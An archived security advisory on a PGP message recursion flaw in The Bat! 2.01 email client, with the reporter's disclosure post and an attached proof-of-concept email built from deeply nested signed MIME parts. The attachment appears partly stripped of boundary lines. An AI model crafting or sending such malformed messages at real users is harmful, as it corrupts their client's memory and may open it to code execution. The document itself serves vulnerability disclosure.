Home    |    View Topics    |    Search    |    Contact Us    |   



Category:   Application (E-mail Client)  >   The Bat! Vendors:   RIT Research Labs
The Bat! PGP Message Recursion Flaw May Permit Remote Code Execution
SecurityTracker Alert ID:  1008740
SecurityTracker URL:
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jan 16 2004
Impact:   Execution of arbitrary code via network, User access via network

Version(s): 2.01
Description:   A vulnerability was reported in The Bat! in the processing of PGP-signed messages. A remote user may be able to execute arbitrary code.

It is reported that a remote user can send a specially crafted PGP-signed e-mail message with multiple recursively included MIME parts to trigger the flaw and cause a handled exception on the target system. The report said that by changing the layout of the MIME parts and signatures, a malicious e-mail can cause The Bat! to read from and write to various unallocated memory locations, suggesting that arbitrary code execution may be possible.

The vendor was reportedly unable to reproduce the flaw in version 2.03 Beta.

According to the report, the version 1.x series is not vulnerable.

A demonstration exploit message is provided in the Source Message.

AGK (agk at is credited with discovering this flaw.

Impact:   A remote user may be able to cause The Bat! to execute arbitrary code. [Editor's note: Arbitrary code execution was not confirmed in the report.]
Solution:   The vendor was reportedly unable to reproduce the flaw in version 2.03 Beta.
Vendor URL: (Links to External Site)
Cause:   Boundary error, State error
Underlying OS:  Windows (Any)

Message History:   None.

 Source Message Contents

Subject:  [Full-Disclosure] The Bat! 2.01 memory corruption

Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Dear bugtraq,

AGK (agk at discovered The Bat! 2.01 to throw exception on few
messages.  It  looks  like The Bat! 2.01 in standard configuration (with
build-in  PGP  support)  has  a  bug with processing PGP signed messages
(protocol="application/pgp-signature")    with    multiple   recursively
included  parts. I did not any debugging and problem may be in something
else, but changing layout of parts and signatures makes The Bat! to read
_and  write_ different unallocated memory regions, potentially it may be
exploitable  to  code execution. Because The Bat! has it's own exception
handler, application does not crash.

Vendor  (RitLabs)  was  contacted and replied he was unable to reproduce
this  bug  in  2.03  Beta  and  latest release 2.02 CE is _probably_ not
vulnerable   to.  I  did  not  any  validation.  1.x  versions  are  not

Example of message attached.

        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
Content-Type: message/rfc822; name="batcrash.msg"
Content-Disposition: attachment; filename="batcrash.msg"

From: "Test"
To: "Test"
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-VOhSalJVh0ipN8GZDCj3"
Mime-Version: 1.0
Date: 31 Dec 2003 23:42:47 +0300

Content-Type: multipart/mixed; boundary="=-HuumM/Y9Qpvq2SoxnAYs"

Content-Type: multipart/alternative; boundary="=-rxC2ED57bE++pIpgCxGK"

Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hello administrator.


Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: quoted-printable

-- <BR>


Content-Disposition: inline
Content-Type: message/rfc822

Date: Sat, 27 Dec 2003 10:18:57 +0300 (MSK)
From: Test
Subject: Test2
To: Test
MIME-Version: 1.0
Content-Type: multipart/report; report-type=delivery-status; boundary="38853510C39.1072549137/test"
Message-Id: <20031227181857.E5FA4510D0D@test>

Content-Description: Notification
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable


Content-Description: Delivery error report
Content-Type: message/delivery-status
Content-Transfer-Encoding: quoted-printable

Reporting-MTA: dns; test
Arrival-Date: Sat, 27 Dec 2003 10:18:53 -0800 (PST)



Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

Version: Test





Full-Disclosure - We believe in it.


Go to the Top of This SecurityTracker Archive Page

Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, LLC